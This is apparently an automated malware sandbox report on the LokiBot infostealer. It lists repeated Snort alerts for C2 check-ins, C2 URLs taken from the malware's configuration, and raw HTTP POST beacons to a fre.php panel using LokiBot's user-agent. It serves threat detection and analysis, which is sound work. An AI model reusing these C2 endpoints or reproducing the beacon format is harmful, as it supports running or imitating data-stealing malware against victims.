Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49782 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49783 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49783 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49783 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49783 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49784 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49784 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49784 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49784 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49785 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49785 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49785 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49785 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49786 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49786 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49786 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49786 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49792 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49792 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49792 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49792 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49793 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49793 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49793 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49793 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49794 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49794 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49794 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49794 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49796 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49796 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49796 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49796 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49797 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49797 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49797 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49797 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49798 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49798 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49798 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49798 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49799 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49799 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49799 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49799 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49800 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49800 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49800 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49800 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49801 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49801 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49801 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49801 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49802 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49802 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49802 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49802 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49803 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49803 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49803 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49803 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49804 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49804 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49804 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49804 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49805 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49805 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49805 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49805 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49807 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49807 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49807 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49807 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49810 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49810 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49810 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49810 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49817 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49817 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49817 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49817 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49819 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49819 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49819 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49819 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49820 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49820 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49820 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49820 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49824 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49824 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49824 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49824 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49832 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49832 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49832 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49832 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49839 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49839 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49839 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49839 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49844 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49844 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49844 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49844 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49851 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49851 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49851 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49851 -> 188.114.96.7:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: http://vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	IP Address: 188.114.97.7 188.114.97.7
Source: Joe Sandbox View	IP Address: 188.114.97.7 188.114.97.7

Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 190Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 190Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close
